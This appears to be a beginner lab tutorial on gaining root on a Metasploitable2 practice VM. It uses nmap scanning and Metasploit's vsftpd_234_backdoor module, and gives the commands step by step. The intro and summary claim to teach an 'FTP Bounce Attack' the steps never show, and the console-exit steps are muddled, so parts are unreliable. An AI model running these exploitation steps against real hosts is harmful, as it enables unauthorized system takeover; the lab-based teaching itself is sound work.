Exploiting FTP Service Vulnerabilities

CybersecurityCybersecurityBeginner
Practice Now

Introduction

In this lab, you will learn how to exploit vulnerabilities in the File Transfer Protocol (FTP) service to gain unauthorized access to a target machine. The scenario is set in a cybersecurity context, where you will assume the role of an ethical hacker tasked with identifying and exploiting vulnerabilities in a vulnerable FTP server.

The objective of this lab is to gain root access to the Metasploitable2 target machine by leveraging an FTP service vulnerability and utilizing the Metasploit Framework, a popular penetration testing tool. Through this hands-on experience, you will gain a deeper understanding of the FTP Bounce Attack, port scanning techniques, and the exploitation process using Metasploit.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL cybersecurity(("`Cybersecurity`")) -.-> cybersecurity/NmapGroup(["`Nmap`"]) cybersecurity/NmapGroup -.-> cybersecurity/nmap_port_scanning("`Nmap Port Scanning Methods`") cybersecurity/NmapGroup -.-> cybersecurity/nmap_timing_performance("`Nmap Timing and Performance`") subgraph Lab Skills cybersecurity/nmap_port_scanning -.-> lab-416132{{"`Exploiting FTP Service Vulnerabilities`"}} cybersecurity/nmap_timing_performance -.-> lab-416132{{"`Exploiting FTP Service Vulnerabilities`"}} end

Set up the Lab Environment

In this step, you will set up the lab environment, which consists of two virtual machines: the Kali Linux machine as the attacker, and the Metasploitable2 machine as the target.

  1. Start the Metasploitable2 virtual machine by running the following command in the terminal:
sudo virsh start Metasploitable2
  1. Verify that the Metasploitable2 machine is running by pinging it:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

  1. Launch the Kali Linux container and enter its bash shell:
docker run -ti --network host b5b709a49cd5 bash
  1. Test the network connectivity between the Kali Linux container and the Metasploitable2 machine:
ping 192.168.122.102

Press Ctrl+C to stop the ping.

Now both the attack machine and the target machine are running, and you can start the penetration testing.

Note: If you accidentally exit the current bash, the Kali container will automatically stop. You can execute docker run -ti --network host b5b709a49cd5 bash again on the host to start a new Kali container and enter bash to continue the experiment.

Perform Port Scanning

In this step, you will use the Nmap scanning tool to identify open ports and services running on the Metasploitable2 target machine.

  1. Start the PostgreSQL database service, which is required by Metasploit:
service postgresql start
  1. Initialize the Metasploit database:
msfdb init
  1. Launch the Metasploit Framework console:
cd ~
msfconsole
  1. Use Nmap to scan the target machine and identify open ports:
nmap -sV -T4 192.168.122.102

The -sV option enables version detection for open ports, and -T4 sets the timing policy for faster scanning.

Press Ctrl+D to quit the Metasploit console then start the inspection

Exploit the FTP Service Vulnerability

In this step, you will leverage the identified FTP service vulnerability to gain unauthorized access to the Metasploitable2 target machine.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. Search for an FTP scanner module in Metasploit:
search scanner/ftp
  1. Use the ftp_version module to scan the FTP service:
use auxiliary/scanner/ftp/ftp_version
  1. Set the target host for the scan:
set RHOSTS 192.168.122.102
  1. Run the FTP version scan:
exploit
  1. Based on the FTP version identified, search for a corresponding exploitation module:
search vsFTPd
  1. Use the vsftpd_234_backdoor module to exploit the vulnerability:
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Set the target host for the exploitation:
set RHOST 192.168.122.102
  1. Execute the exploitation:
exploit

Press Ctrl+D to quit the Metasploit console then start the inspection

Verify the Successful Exploitation

In this step, you will verify that the exploitation was successful and you have gained root access to the Metasploitable2 target machine.

  1. First of all, if you are not in the Metasploit console, you should start the Metasploit console:
cd ~
msfconsole
  1. Check the current user:
whoami
  1. Check the hostname of the compromised machine:
hostname
  1. Check the IP address of the compromised machine:
ifconfig

Press Ctrl+D to quit the Metasploit console then start the inspection

Summary

In this lab, you learned how to exploit an FTP service vulnerability to gain unauthorized access to a target machine. You set up a lab environment with a vulnerable Metasploitable2 machine and a Kali Linux attack machine. You performed port scanning using Nmap to identify open ports and services, and then leveraged the Metasploit Framework to exploit an identified FTP service vulnerability. Finally, you verified the successful exploitation by checking the current user, hostname, and IP address of the compromised machine.

Through this hands-on experience, you gained practical knowledge and skills in identifying and exploiting vulnerabilities, using popular cybersecurity tools like Nmap and Metasploit, and understanding the FTP Bounce Attack technique. These skills are essential for ethical hackers and cybersecurity professionals to assess and strengthen the security posture of systems and networks.

Other Cybersecurity Tutorials you may like